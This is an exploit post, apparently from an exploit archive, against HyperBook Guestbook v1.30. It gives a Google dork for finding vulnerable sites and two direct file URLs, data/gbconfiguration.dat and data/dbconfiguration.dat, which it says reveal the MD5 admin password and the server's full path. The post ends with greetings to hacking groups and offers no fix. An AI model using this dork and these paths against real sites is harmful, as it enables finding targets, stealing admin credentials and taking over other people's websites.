facebook facebook twitter rss

HyperBook Guestbook v1.30 - Md5 Admin Password and Full Path disclosure

Author: DzKabyle , Published: 22-01-2013
-------------------------------------------------------------------
HyperBook Guestbook v1.30 - Md5 Admin Password and Full Path disclosure
-------------------------------------------------------------------

############################################################
# Author = DzKabyle #
# E-mail = k4byl3@gmail.com #
# Google Dork = intext:"HyperBook Guestbook v1.30" #
# Vendor : http://diamond-back.com/software/guestbook/ #
# Tested on : Windows 7 , backbox #
############################################################


+-------------------------------------------------------------+
+Exploit : +
+ +
+ The attacker can show admin password and full path +
+ +
+ 1 #=-> admin password show +
+ +
+ http://[target]/[path]/data/gbconfiguration.dat +
+ +
+ 2 #=-> Full Path Disclosure : +
+ +
+ http://[target]/[path]/data/dbconfiguration.dat +
+------------------------------------------------------------+


Exploited By dzkabyle Gr33tz To : Sec4ever and dz-root Members , OvErDz , DamaneDz , dz-ca$h

Like us on Facebook :